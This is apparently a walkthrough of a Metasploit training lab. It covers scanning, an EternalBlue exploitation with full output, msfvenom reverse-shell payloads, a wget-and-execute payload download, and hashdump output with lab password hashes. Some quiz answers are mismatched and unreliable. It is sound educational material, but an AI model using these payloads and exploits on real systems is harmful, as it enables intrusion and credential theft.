Introduction
In this room, we will learn how to use Metasploit for vulnerability scanning and exploitation.
We will also cover how the database feature makes it easier to manage penetration testing engagements with a broader scope.
Finally, we will look at generating payloads with msfvenom and how to start a Meterpreter session on most target platforms.
More specifically, the topics we will cover are:
- How to scan target systems using Metasploit.
- How to use the Metasploit database feature.
- How to use Metasploit to conduct a vulnerability scan.
- How to use Metasploit to exploit vulnerable services on target systems.
- How
msfvenomcan be used to create payloads and obtain a Meterpreter session on the target system.
Scanning
Port Scanning
Metasploit has a number of modules to scan open ports on the target system and network. You can list potential port scanning modules available using the search portscan command.
msf6 > search portscan
Port scanning modules will require you to set a few options:
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) >
- CONCURRENCY: Number of targets to be scanned simultaneously.
- PORTS: Port range to be scanned. Please note that 1-1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most used ports, while Metasploit will scan port numbers from 1 to 10000.
- RHOSTS: Target or target network to be scanned.
- THREADS: Number of threads that will be used simultaneously. More threads will res
You can directly perform Nmap scans from the msfconsole prompt as shown below faster:
msf6 > nmap -sS 10.10.12.229
As for information gathering, if your engagement requires a speedier approach to port scanning, Metasploit may not be your first choice. However, a number of modules make Metasploit a useful tool for the scanning phase.
UDP service Identification
The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP (User Datagram Protocol).
As you can see below, this module will not conduct an extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.
msf6 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.10.12.229->10.10.12.229 (1 hosts)
[*] Discovered NetBIOS on 10.10.12.229:137 (JON-PC::U :WORKGROUP::G :JON-PC::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :02:ce:59:27:c8:e3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/udp_sweep) >
SMB Scans
Metasploit offers several useful auxiliary modules that allow us to scan specific services.
Below is an example for the SMB (Server Message Block).
Especially useful in a corporate network would be smb_enumshares and smb_version but please spend some time to identify scanners that the Metasploit version installed on your system offers.
msf6 auxiliary(scanner/smb/smb_version) > run
[+] 10.10.12.229:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
[*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
Answer the questions
How many ports are open on the target system?
msf > nmap -sS 10.10.42.106
Answer: 5
Using the relevant scanner, what NetBIOS name can you see?
msf > search NetBios
msf > use auxiliary/scanner/netbios/nbname
msf > setg RHOSTS 10.10.42.106
msf > run
Answer: ACME IT SUPPORT
What is running on port 8000?
msf > nmap -A 10.10.42.106
Answer: webfs/1.21
What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
msf > search name:smb description:login
msf > use auxiliary/scanner/smb/smb_login
msf > setg RHOSTS 10.10.42.106
msf > set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
msf run
Answer: webfs/1.21
The Metasploit Database
Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.
systemctl start postgresql
sudo -u postgres msfdb init
You can now launch msfconsole and check the database status using the db_status command.
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >
The database feature will allow you to create workspaces to isolate different projects.
When first launched, you should be in the default workspace.
workspace: To list available workspaceworkspace -a tryhackme: to add workspaceworkspace -d tryhackme: to delete workspaceworkspace -r tryhackme tryhackme2: to rename workspaceworkspace -h: to list available options for theworkspacecommand
Different from regular Metasploit usage, once Metasploit is launched with a database, the help command, you will show the Database Backends Commands menu.
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
If you run a Nmap scan using the db_nmap shown below, all results will be saved to the database.
msf6 > db_nmap -sV -p- 10.10.12.229
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49162/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >
You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 135 tcp msrpc open Microsoft Windows RPC
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.12.229 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229 3389 tcp ssl/ms-wbt-server open
10.10.12.229 49152 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49153 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49154 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49158 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49162 tcp msrpc open Microsoft Windows RPC
msf6 >
Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.
Example Workflow
- We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the
use auxiliary/scanner/smb/smb_ms17_010command. - We set the RHOSTS value using
hosts -R. - We have typed
show optionsto check if all values were assigned correctly. (In this example, 10.10.138.32 is the IP address we have scanned earlier using thedb_nmapcommand) - Once all parameters are set, we launch the exploit using the
runorexploitcommand.
If there is more than one host saved to the database, all IP addresses will be used when the hosts -R command is used.
In a typical penetration testing engagement, we could have the following scenario:
- Finding available hosts using the
db_nmapcommand - Scanning these for further vulnerabilities or open ports (using a port scanning module)
The services command used with the -S parameter will allow you to search for specific services in the environment.
msf6 > services -S netbios
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
msf6 >
You may want to look for low-hanging fruits such as:
- HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
- FTP: Could allow anonymous login and provide access to interesting files.
- SMB: Could be vulnerable to SMB exploits like MS17-010
- SSH: Could have default or easy to guess credentials
- RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.
Vulnerability Scanning
Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function on Metasploit to list useful modules. The results will contain payload and post modules. At this stage, these results are not very useful as we have not discovered a potential exploit to use just yet. However, in the case of VNC, there are several scanner modules that we can use.
Example: VNC scanning modules
msf6 > use auxiliary/scanner/vnc/
use auxiliary/scanner/vnc/ard_root_pw use auxiliary/scanner/vnc/vnc_login use auxiliary/scanner/vnc/vnc_none_auth
msf6 > use auxiliary/scanner/vnc/
You can use the info command for any module to have a better understanding of its use and purpose.
Answer the questions
How many ports are open on the target system?
msf > info auxiliary/scanner/smtp/smtp_relay
Answer: Campbell Murray
Exploitation
As the name suggests, Metasploit is an exploitation framework. Exploits are the most populated module category.
You can search exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit. While the process itself is simple, remember that a successful outcome depends on a thorough understanding of services running on the target system.
Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other commands you can use with that specific exploit.
Once you have decided on the payload, you can use the set payload command to make your choice.
Note that choosing a working payload could become a trial and error process due to environmental or OS restrictions such as firewall rules, anti-virus, file writing, or the program performing the payload execution isn't available (eg. payload/python/shell_reverse_tcp).
Some payloads will open new parameters that you may need to set, running the show options command once more can show these. As you can see in the above example, a reverse payload will at least require you to set the LHOST option.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.186.44
lhost => 10.10.186.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.186.44:4444
[*] 10.10.12.229:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.12.229:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.12.229:445 - Connecting to target for exploitation.
[+] 10.10.12.229:445 - Connection established for exploitation.
[+] 10.10.12.229:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.12.229:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.12.229:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.12.229:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.12.229:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.12.229:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.12.229:445 - Sending all but last fragment of exploit packet
[*] 10.10.12.229:445 - Starting non-paged pool grooming
[+] 10.10.12.229:445 - Sending SMBv2 buffers
[+] 10.10.12.229:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.12.229:445 - Sending final SMBv2 buffers.
[*] 10.10.12.229:445 - Sending last fragment of exploit packet!
[*] 10.10.12.229:445 - Receiving response from exploit packet
[+] 10.10.12.229:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.12.229:445 - Sending egg to corrupted connection.
[*] 10.10.12.229:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.186.44:4444 -> 10.10.12.229:49366) at 2021-08-20 04:51:19 +0100
C:\Windows\system32>
Once a session is opened, you can background it using CTRL+Z or abort it using CTRL+C. Backgrounding a session will be useful when working on more than one target simultaneously or on the same target with a different exploit and/or shell.
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.10.186.44:4444 -> 10.10.12.229:49366 (10.10.12.229)
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Working with sessions
The sessions command will list all active sessions. The sessions command supports a number of options that will help you manage sessions better.
You can interact with any existing session using the sessions -i command followed by the session ID.
Answer the questions
What is the content of the flag.txt file?
msfconsole
msf6 > nmap -A -nn 10.10.140.203
[*] exec: nmap -A -nn 10.10.140.203
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-18 07:45 BST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 44.44% done; ETC: 07:46 (0:00:33 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 44.44% done; ETC: 07:47 (0:00:45 remaining)
Nmap scan report for 10.10.140.203
Host is up (0.00032s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2025-10-18T06:47:24+00:00; 0s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:52:21:14:0D:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/18%OT=135%CT=1%CU=36906%PV=Y%DS=1%DC=D%G=Y%M=025221
OS:%TM=68F33837%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=I%CI=I%II
OS:=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M23
OS:01NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=20
OS:00%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=N%Q=)T1(R=Y
OS:%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:21:14:0d:07 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-10-18T01:47:09-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-10-18T06:47:09
|_ start_date: 2025-10-18T06:33:24
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 10.10.140.203
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.64 seconds
msf6 > search type:exploit smb windows 7
154 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
155 \_ target: Automatic Target . . . .
156 \_ target: Windows 7
msf6 > use 154
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://d
ocs.metasploit.com/docs/using-met
asploit/basics/using-metasploit.h
tml
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to
use for authentication. Only affe
cts Windows Server 2008 R2, Windo
ws 7, Windows Embedded Standard 7
target machines.
SMBPass no (Optional) The password for the s
pecified username
SMBUser no (Optional) The username to authen
ticate as
VERIFY_ARCH true yes Check if remote architecture matc
hes exploit Target. Only affects
Windows Server 2008 R2, Windows 7
, Windows Embedded Standard 7 tar
get machines.
VERIFY_TARGET true yes Check if remote OS matches exploi
t Target. Only affects Windows Se
rver 2008 R2, Windows 7, Windows
Embedded Standard 7 target machin
es.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST 10.10.199.66 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.140.203
RHOSTS => 10.10.140.203
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.199.66:4444
[*] 10.10.140.203:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.140.203:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.140.203:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.140.203:445 - The target is vulnerable.
[*] 10.10.140.203:445 - Connecting to target for exploitation.
[+] 10.10.140.203:445 - Connection established for exploitation.
[+] 10.10.140.203:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.140.203:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.140.203:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.140.203:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.140.203:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.140.203:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.140.203:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.140.203:445 - Sending all but last fragment of exploit packet
[*] 10.10.140.203:445 - Starting non-paged pool grooming
[+] 10.10.140.203:445 - Sending SMBv2 buffers
[+] 10.10.140.203:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.140.203:445 - Sending final SMBv2 buffers.
[*] 10.10.140.203:445 - Sending last fragment of exploit packet!
[*] 10.10.140.203:445 - Receiving response from exploit packet
[+] 10.10.140.203:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.140.203:445 - Sending egg to corrupted connection.
[*] 10.10.140.203:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.10.140.203
[*] Meterpreter session 1 opened (10.10.199.66:4444 -> 10.10.140.203:49192) at 2025-10-18 07:59:50 +0100
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > search -f flag.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag.txt 15 2021-07-15 03:39:25 +0100
meterpreter > shell
Process 1064 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\Users\Jon\Documents\flag.txt
type c:\Users\Jon\Documents\flag.txt
THM-5455554845
C:\Windows\system32>exit
exit
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
meterpreter >
Answer: THM-5455554845
What is the NTLM hash of the password of the user "pirate"?
Answer: 8ce9a3ebd1647fcc5e04025019f4b875
Msfvenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.
Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).
You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python).
msfvenom -l payloads
The msfvenom --list formats command can be used to list supported output formats
Encoders
encoders do not aim to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While it can be effective against some antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem.
The example below shows the usage of encoding (with the -e parameter. The PHP version of Meterpreter was encoded in Base64, and the output format was raw.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
Handlers
Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically handled by the exploit module, you will remember how the payload options title appeared when setting a reverse shell.
The term commonly used to receive a connection from a target is 'catching a shell'. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.
The following scenario may be familiar, we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application).
For the exercises in this task, you will need to replicate a similar scenario on another target system, DVWA was used here for illustration purposes.
The exploit steps are:
- Generate the PHP shell using MSFvenom
- Start the Metasploit handler
- Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect.
Seen below, 10.0.2.19 is the IP address of the AttackBox used in the attack and local port 7777 was chosen.
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
Please note: The output PHP file will miss the starting PHP tag commented and the end tag (?>).
We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.
Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set lhost 10.0.2.19
lhost => 10.0.2.19
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.186.44:7777
When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.
If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.
Other Payloads
Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.
Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
The .elf format is comparable to the .exe format in Windows.
These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine.
For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions.
Once done, you can run this file by typing ./shell.elf on the target machine command line.
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
All of the examples above are reverse payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine to work as a handler.
You will need to set up the handler accordingly with the payload, LHOST and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.
Answer the questions
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.
$ sudo su
[sudo] password for murphy: 1q2w3e4r
root@ip-10-10-9-56:/#
Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.23.177.52 LPORT=4444 -f elf > shell.elf
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
$ mkdir web
$ mv shell.elf web/
$ python3 -m http.server 9000
Get a meterpreter session on the target machine.
Prepare the listener:
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > payload payload/linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.23.177.52
msf exploit(multi/handler) > run
Activate the exploit:
root@ip-10-10-9-56:/# wget http://10.23.177.52:9000/shell.elf
root@ip-10-10-9-56:/# chmod +x shell.elf
root@ip-10-10-9-56:/# ./shell.elf
Use a post exploitation module to dump hashes of other users on the system.
msf > search type:post name:linux hash
msf > use post/linux/gather/hashdump
msf post(linux/gather/hasdump) > set SESSION 1
msf post(linux/gather/hasdump) > run
claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/bash
What is the other user's password hash?
Answer: $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
You should now have a better understanding of how Metasploit can help you identify potential vulnerabilities on target systems and exploit these vulnerabilities.
You have also seen how the database feature can help you with penetration testing engagements where you have multiple potential targets.
Finally, you should have gained some experience with msfvenom and the creation of stand-alone Meterpreter payloads.
This is especially helpful in situations where you can upload a file to the target system or have the ability to download files to the target system. Meterpreter is a powerful tool that offers a lot of easy to use features during the post-exploitation phase.